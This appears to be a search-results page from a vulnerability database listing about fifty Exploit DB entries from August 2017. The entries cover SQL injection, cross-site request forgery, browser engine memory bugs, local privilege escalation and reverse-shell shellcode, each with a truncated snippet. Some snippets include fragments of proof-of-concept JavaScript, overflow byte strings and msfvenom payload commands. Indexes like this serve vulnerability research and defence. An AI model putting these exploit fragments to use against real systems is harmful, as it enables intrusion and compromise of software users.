Lucene search
+L
ExploitdbRecent

47904 matches found

Exploit DB
Exploit DB
added 2017/08/18 12:0 a.m.58 views

ZKTime Web Software 2.0 - Cross-Site Request Forgery

Exploit Title: ZKTime Web Software 2.0 - Cross Site Request Forgery CVE-ID: CVE-2017-13129 Vendor Homepage: https://www.zkteco.com/product/ZKTimeWeb2.0435.html Vendor of Product: ZKTeco Affected Product Code: ZKTime Web - 2.0.1.12280 Category: WebApps Author: Arvind V. Author Social: @FindArvind...

8CVSS7.9AI score0.01079EPSS
Exploits4
Exploit DB
Exploit DB
added 2017/08/18 12:0 a.m.36 views

iTech Freelancer Script 5.27 - SQL Injection

Exploit Title: iTech Freelancer Script 5.27 - SQL Injection Dork: N/A Date: 18.08.2017 Vendor Homepage : http://itechscripts.com/ Software Link: http://itechscripts.com/freelancer-script/ Demo: http://freelance.itechscripts.com/ Version: 5.27 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.29 views

Food Ordering Script 1.0 - SQL Injection

Exploit Title: Food Ordering Script 1.0 - SQL Injection Dork: N/A Date: 17.08.2017 Vendor Homepage : http://www.earthtechnology.co.in/ourproducts.html Software Link: https://www.foodorderingscript.com/ Demo: https://www.foodorderingscript.com/demo-new/ Version: 1.0 Category: Webapps Tested on:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.37 views

MyDoomScanner 1.00 - Local Buffer Overflow (PoC)

!/usr/bin/python Exploit Title : MyDoomScanner1.00 Hostname/IP Field SEH Overwrite POC Discovery by : Anurag Srivastava Email : [email protected] Discovery Date : 17/08/2017 Software Link : https://www.mcafee.com/in/downloads/free-tools/mydoomscanner.aspx Tested Version : 1.00...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.28 views

Online Quiz Project 1.0 - SQL Injection

Exploit Title: Online Quiz Project 1.0 - Multiple Vulnerabilities Dork: N/A Date: 17.08.2017 Vendor Homepage : http://surajkumar.in/ Software Link: http://surajkumar.in/product/online-quiz-project-php/ Demo: http://surajkumar.in/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.28 views

Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Incorrectly Re-parses

GetOriginalEntryPoint : nullptr; if this-pCurrentFunction && this-pCurrentFunction-IsFunctionParsed Assertthis-pCurrentFunction-StartInDocument == pnode-ichMin; pCurrentFunction" is the consturctor, but "pnode" refers to the method "f". PoC: -- class MyClass fa printa; constructor 'use asm';...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.56 views

Microsoft Edge Chakra - 'chakra!Js::GlobalObject' Integer overflow

= 0; AnalysisAssertscriptContext; if scriptContext-GetThreadContext-EvalDisabled throw Js::EvalDisabledException; ifdef PROFILEEXEC scriptContext-ProfileBeginJs::EvalCompilePhase; endif void frameAddr = nullptr; GETCURRENTFRAMEIDframeAddr; HRESULT hr = SOK; HRESULT hrParser = SOK; HRESULT hrCodeG...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.24 views

Microsoft Edge Chakra - 'EmitAssignment' uses the 'this' Register Without Initializing

000c ProfiledLdEnvSlot R4 = 13 Line 28: super.a = 1; Col 13: ^ 0018 LdHomeObjProto R8 R4 001d ProfiledStSuperFld R8.this=R5 = R3 0 0025 LdUndef R0 Line 29: Col 9: ^ 0027 Ret PoC: -- class Parent ; class Child extends Parent constructor = super.a = 10; // Implicitly use the "this" register. So it...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.43 views

Microsoft Edge Chakra - 'JavascriptArray::ConcatArgs' Type Confusion

void JavascriptArray::ConcatArgsRecyclableObject pDestObj, TypeId remoteTypeIds, Js::Arguments& args, ScriptContext scriptContext, uint start, uint startIdxDest, BOOL firstPromotedItemIsSpreadable, BigIndex firstPromotedItemLength, bool spreadableCheckedAndTrue JSREENTRANCYLOCKjsReentLock,...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.97 views

Microsoft Edge Chakra - Heap Buffer Overflow

IsCoroutine ... else InterpreterStackFrame::Setup setupfunction, args; sizet varAllocCount = setup.GetAllocationVarCount; //printf"varAllocCount: %d%X\r\n", varAllocCount, varAllocCount; sizet varSizeInBytes = varAllocCount sizeofVar; // // Allocate a new InterpreterStackFrame instance on the...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.25 views

Microsoft Edge Chakra - 'PreVisitCatch' Missing Call

root-sxFnc.pnodeVars; pnode; pnode = pnode-sxVar.pnodeNext Symbol sym = pnode-sxVar.sym; if sym != nullptr && !pnode-sxVar.isBlockScopeFncDeclVar && sym-GetIsBlockVar if sym-GetIsCatch || pnode-nop == knopVarDecl && sym-GetIsBlockVar ... sym = funcInfo-bodyScope-FindLocalSymbolsym-GetName;...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.31 views

Photogallery Project 1.0 - SQL Injection

Exploit Title: Photogallery Project 1.0 - Multiple Vulnerabilities Dork: N/A Date: 17.08.2017 Vendor Homepage : http://surajkumar.in/ Software Link: http://surajkumar.in/product/photogallery-project-in-php/ Demo: http://surajkumar.in/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.22 views

Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2

a0 = ; return 0; ; a0.toString; main; I just changed "var b = new Uint32Array100;" to "var b = new Uint32Array0;", and it worked well. PoC: -- 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main var a = 1.1, 2.2; var b = new Uint32Array0; // 0 // force t...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.25 views

Microsoft Edge Chakra - 'TryUndeleteProperty' Incorrect Usage (Denial of Service)

::NoSlots return false; propertyIndex = deletedPropertyIndex; deletedPropertyIndex = staticcastTaggedInt::ToInt32object-GetSlotdeletedPropertyIndex; return true; bool SimpleDictionaryUnorderedTypeHandle::TryUndeleteProperty DynamicObject const object, const TPropertyIndex existingPropertyIndex,...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.26 views

Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Incorrect Usage of 'PushPopFrameHelper' (Denial of Service)

GetScriptContext-GetThreadContext-GetLeafInterpreterFrame; GetLoopHeaderinterpreterFrame-GetCurrentLoopNum; GetCurrentLoopNum == -1 ... PoC: -- function asmModule 'use asm'; let a = 1, 2, 3, 4; for let i = 0; i 0x100000; i++ // JIT a0 = 1; if i === 0x30000 a0 = ; // the array type changed,...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.57 views

Microsoft Edge Chakra - Buffer Overflow

sxCall.argCount; //pnode-sxCall.argCount=0xFFFF argCount++; // include "this" //overflow!!!! argCount==0 BOOL fSideEffectArgs = FALSE; unsigned int tmpCount = CountArgumentspnode-sxCall.pnodeArgs, &fSideEffectArgs; AssertargCount == tmpCount; if argCount != Js::ArgSlotargCount...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.55 views

Microsoft Edge Chakra - NULL Pointer Dereference

spreadIndices = nullptr // This function emits the arguments for a call. // ArgOut's with uses immediately following defs. EmitArgListStartthisLocation, byteCodeGenerator, funcInfo, callSiteId; Js::RegSlot evalLocation = Js::Constants::NoRegister; // // If Emitting arguments for eval and assignin...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.30 views

Microsoft Edge - Out-of-Bounds Access when Fetching Source

// The attached JavaScript file causes an out-of-bounds access of the source buffer when fetching the source for one of the functions during delayed compilation. The out-of-bounds value is then treated as the pointer to the source. This is likely an exploitable condition. // In the debug build of...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.27 views

Microsoft Edge Chakra - Uninitialized Arguments (1)

ParseNodePtr Parser::ParseVariableDeclaration tokens declarationType, charcountt ichMin, BOOL fAllowIn/ = TRUE/, BOOL pfForInOk/ = nullptr/, BOOL singleDefOnly/ = FALSE/, BOOL allowInit/ = TRUE/, BOOL isTopVarParse/ = TRUE/, BOOL isFor/ = FALSE/, BOOL nativeForOk /= nullptr/ ... if pid ==...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.41 views

Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3

'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main let a = 1.1, 2.2; let b = new Uint32Array100; for let i = 0; i a0 = ; return 0; ; a0.toString; main; // Tested on Microsoft Edge 40.15063.0.0Insider Preview...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.23 views

Microsoft Edge Chakra - Uninitialized Arguments (2)

void Parser::ParseFncFormalsParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags ... if IsES6DestructuringEnabled && IsPossiblePatternStart ... // Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward. for ParseNodePtr...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.36 views

Microsoft Edge Chakra - 'JavascriptFunction::EntryCall' Fails to Handle 'CallInfo' Properly

GetScriptContext, Js::Constants::MinStackDefault; RUNTIMEARGUMENTSargs, callInfo; ScriptContext scriptContext = function-GetScriptContext; Assert!callInfo.Flags & CallFlagsNew; /// /// Check Argument0 has internal Call property /// If not, throw TypeError /// if args.Info.Count == 0 ||...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.31 views

Microsoft Edge Chakra - 'EmitNew' Integer Overflow

sxCall.argCount; argCount++; // include "this" BOOL fSideEffectArgs = FALSE; unsigned int tmpCount = CountArgumentspnode-sxCall.pnodeArgs, &fSideEffectArgs; AssertargCount == tmpCount; if argCount != Js::ArgSlotargCount Js::Throw::OutOfMemory; ... "Js::ArgSlot" is a 16 bit unsigned integer type...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.31 views

Adobe Flash - Invoke Accesses Trait Out-of-Bounds

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1320 The attached fuzzed swf file causes the traits of an ActionScript object to be accessed out of bounds. This can probably lead to exploitable type confusion. Proof of Concept:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.68 views

Linux/x86-64 - Reverse Shell (192.168.1.2:4444) Shellcode (153 bytes)

Linux/x86-64 - Reverse Shell 192.168.1.2:4444 Shellcode 153 bytes. Shellcode exploit for Linx86-64 platform / ;Title: Linux/x8664 - Reverse Shell Shellcode 192.168.1.2:4444 ;Author: Touhid M.Shaikh ;Contact: https://github.com/touhidshaikh ;Category: Shellcode ;Architecture: Linux x8664...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/17 12:0 a.m.36 views

Doctor Patient Project 1.0 - SQL Injection

Exploit Title: Doctor Patient Project 1.0 - Multiple Vulnerabilities Dork: N/A Date: 17.08.2017 Vendor Homepage : http://surajkumar.in/ Software Link: http://surajkumar.in/product/doctor-patient-project-php/ Demo: http://surajkumar.in/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx6...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/16 12:0 a.m.49 views

Microsoft Edge 38.14393.1066.0 - 'CInputDateTimeScrollerElement::_SelectValueInternal' Out-of-Bounds Read

input:focus transform: scale10; UpdateSelectedthis-arrayatoffset0xB8this-indexatoffset0xD4.ptratindex0, ...; ... The problem is that the index in the PoC has unsigned 32-bit value of 0xffffffff, possibly because the data structure has not been properly initialized, which leads to out-of-bound...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/16 12:0 a.m.28 views

RPi Cam Control < 6.3.14 - Multiple Vulnerabilities

Exploit Title: RPi Cam Control = v6.3.14 RCE Multiple Vulnerabilities - preview.php Date: 16/08/2017 Exploit Author: Alexander Korznikov Vendor Homepage: https://github.com/silvanmelchior/RPiCamWebInterface Software Link: https://github.com/silvanmelchior/RPiCamWebInterface Version: = v6.3.14 Dat...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/16 12:0 a.m.36 views

Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service

/ IOFireWireFamily-null-deref.c Brandon Azad NULL pointer dereference in IOFireWireUserClient::setAsyncRefIsochChannelForceStop. Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44236.zip / include int main int ret = 0; ioservicet service =...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/15 12:0 a.m.123 views

Internet Download Manager 6.28 Build 17 - Local Buffer Overflow (SEH Unicode)

!/usr/bin/python Exploit Title: Internet Download Manager 6.28 Build 17 - 'Find file' SEH Buffer Overflow Unicode Date: 14-06-2017 Exploit Author: f3ci Tested on: Windows 7 SP1 x86 How to exploit: Open IDM - Downloads - Find - paste exploit string into 'Find file' text field msfvenom -p...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/15 12:0 a.m.32 views

AdvanDate iCupid Dating Software 12.2 - SQL Injection

Exploit Title: iCupid Dating Software 12.2 - SQL Injection Dork: N/A Date: 15.08.2017 Vendor Homepage : https://www.advandate.com/ Software Link: https://www.advandate.com/dating-software-features/ Demo: https://demo.advandate.com/ Version: 12.2 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/15 12:0 a.m.45 views

ClipBucket 2.8.3 - Multiple Vulnerabilities

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title ClipBucket 2.8.3 - Multiple Vulnerabilities .:. Google Dorks .:. "Forged by ClipBucket" inurl:viewcollection.php?cid= .:. Date: August 15, 2017 .:. Exploit Author: bRpsd .:. Skype contact: vegno...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/15 12:0 a.m.79 views

ALLPlayer 7.4 - Local Buffer Overflow (SEH Unicode)

!/usr/bin/python Exploit Title: ALL Player v7.4 SEH Buffer Overflow Unicode Version: 7.4 Date: 15-08-2017 Exploit Author: f3ci Tested on: Windows 7 SP1 x86 head = "http://" seh = "\x0f\x47" 0x0047000f nseh = "\x61\x41" popad align junk = "\x41" 301 junk2 = "\x41" 45 msfvenom -p windows/shellbindt...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/14 12:0 a.m.38 views

Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Local Privilege Escalation

Source: https://www.securify.nl/advisory/SFY20170403/xamarin-studio-for-mac-api-documentation-update-affected-by-local-privilege-escalation.html Abstract Xamarin Studio is an Integrated Development Environment IDE used to create iOS, Mac and Android applications. Xamarin Studio supports...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/14 12:0 a.m.20 views

RPi Cam Control < 6.3.14 - Remote Command Execution

RPi Cam Control = v6.3.14 RCE preview.php Multiple Vulnerabilities A web interface for the RPi Cam Vendor github: https://github.com/silvanmelchior/RPiCamWebInterface Date 16/08/2017 Discovered by @nopernik https://www.linkedin.com/in/nopernik http://www.korznikov.com RPi Cam Control = v6.3.14 is...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/14 12:0 a.m.35 views

Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting

Vulnerability type: Multiple Stored Cross Site Scripting Vendor: Quali Product: CloudShell Affected version: v7.1.0.6508 Patch 6 Patched version: v8 and up Credit: Benjamin Lee CVE ID: CVE-2017-9767 ========================================================== Overview Quali CloudShell v7.1.0.6508...

5.4CVSS5.5AI score0.0298EPSS
Exploits5
Exploit DB
Exploit DB
added 2017/08/13 12:0 a.m.409 views

Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)

// A proof-of-concept local root exploit for CVE-2017-1000112. // Includes KASLR and SMEP bypasses. No SMAP bypass. // Tested on Ubuntu trusty 4.4.0- and Ubuntu xenial 4-8-0- kernels. // // EDB Note: Also included the work from...

7CVSS7AI score0.20797EPSS
Exploits19
Exploit DB
Exploit DB
added 2017/08/13 12:0 a.m.87 views

Tomabo MP4 Converter 3.19.15 - Denial of Service

!/usr/bin/python Exploit Title: Tomabo MP4 Converter DOS Date: 13/08/17 Exploit Author: Andy Bowden Vendor Homepage: http://www.tomabo.com/ Software Link: http://www.tomabo.com/mp4-converter/index.html Version: 3.19.15 Tested on: Windows 7 x86 CVE : None Generate a .m3u file using the python scri...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/12 12:0 a.m.72 views

RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)

!---Enable...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/12 12:0 a.m.84 views

AirMaster 3000M - Multiple Vulnerabilities

?php Exploit Title: AirMaster 3000M multiple Vulnerabilities Date: 2017/08/12 Exploit Author: Koorosh Ghorbani Author Homepage: http://8thbit.net/ Vendor Homepage: http://mobinnet.ir/ Software Version: V2.0.1B1044 Web Server: GoAhead-Webs/2.5.0 define'isDebug',false; define'specialCookie','Cookie...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/11 12:0 a.m.84 views

De-Tutor 1.0 - SQL Injection

Exploit Title: De-Tutor - Private Tutoring and Admission Processing 1.0 - SQL Injection Dork: N/A Date: 11.08.2017 Vendor Homepage : https://sarutech.com/ Software Link: https://codecanyon.net/item/detutor-private-tutoring-and-admission-processing/19053430 Demo: https://demo.sarutech.com/detutor/...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/11 12:0 a.m.73 views

DeWorkshop 1.0 - SQL Injection

Exploit Title: De-Workshop - Auto Workshop Portal 1.0 - SQL Injection Dork: N/A Date: 11.08.2017 Vendor Homepage : https://sarutech.com/ Software Link: https://codecanyon.net/item/deworkshop-auto-workshop-portal/20336737 Demo: https://demo.sarutech.com/deworkshop/ Version: 1.0 Category: Webapps...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/11 12:0 a.m.45 views

De-Journal 1.0 - SQL Injection

Exploit Title: De-Journal - Academic Journal and Peer Review System 1.0 - SQL Injection Dork: N/A Date: 11.08.2017 Vendor Homepage : https://sarutech.com/ Software Link: https://codecanyon.net/item/dejournal-academic-journal-and-peer-review-system/19533981 Demo: https://demo.sarutech.com/dejourna...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/10 12:0 a.m.34 views

GIF Collection 2.0 - SQL Injection

Exploit Title: GIF Collection 2.0 - SQL Injection Dork: N/A Date: 10.08.2017 Vendor Homepage : http://www.scriptfolder.com/ Software Link: http://www.scriptfolder.com/scriptfolder-gif-collection-2-0/ Demo: http://gif2.scriptfolder.com/ Version: 2.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx6...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/10 12:0 a.m.39 views

Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting

Exploit Title: Piwigo plugin User Tag , Persistent XSS Date: 10 Aug, 2017 Extension Version: 0.9.0 Software Link: http://piwigo.org/basics/downloads Extension link : http://piwigo.org/ext/extensionview.php?eid=441 Exploit Author: Touhid M.Shaikh Contact: http://twitter.com/touhidshaikh22 Website:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/10 12:0 a.m.40 views

Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure

var n = 0; function go document.addEventListener"DOMNodeRemoved", eventhandler; eventhandler; function eventhandler n++; ifn==5 return; //prevent going into an infinite recursion t.defaultValue = "aaaaaaaaaaaaaaaaaaaa"; f.reset; aaa !-- ========================================= This seems to be t...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/10 12:0 a.m.69 views

Red-Gate SQL Monitor < 3.10 / 4.2 - Authentication Bypass

Exploit Title: Red-Gate SQL Monitor authentication bypass Version: Redgate SQL Monitor before 3.10 and 4.x before 4.2 Date: 2017-08-10 Red-Gate made a security announcement and publicly released the fixed version more than two years before this exploit was published Vendor Advisory:...

10CVSS9.7AI score0.14074EPSS
Exploits4
Exploit DB
Exploit DB
added 2017/08/10 12:0 a.m.28 views

ImageBay 1.0 - SQL Injection

Exploit Title: ImageBay 1.0 - SQL Injection Dork: N/A Date: 10.08.2017 Vendor Homepage : http://www.scriptfolder.com/ Software Link: http://www.scriptfolder.com/imagebay-publish-or-share-photography-and-pictures/ Demo: http://imagebay.scriptfolder.com/ Version: 1.0 Category: Webapps Tested on:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/09 12:0 a.m.41 views

DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration

!/usr/bin/env python DALIM SOFTWARE ES Core 5.0 build 7184.1 User Enumeration Weakness Vendor: Dalim Software GmbH Product web page: https://www.dalim.com Affected version: ES/ESPRiT 5.0 build 7184.1 build 7163.2 build 7163.0 build 7135.0 build 7114.1 build 7114.0 build 7093.1 build 7093.0 build...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/08/09 12:0 a.m.38 views

DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal

DALIM SOFTWARE ES Core 5.0 build 7184.1 Multiple Remote File Disclosures Vendor: Dalim Software GmbH Product web page: https://www.dalim.com Affected version: ES/ESPRiT 5.0 build 7184.1 build 7163.2 build 7163.0 build 7135.0 build 7114.1 build 7114.0 build 7093.1 build 7093.0 build 7072.0 build...

7.4AI score
Exploits0
Total number of security vulnerabilities47904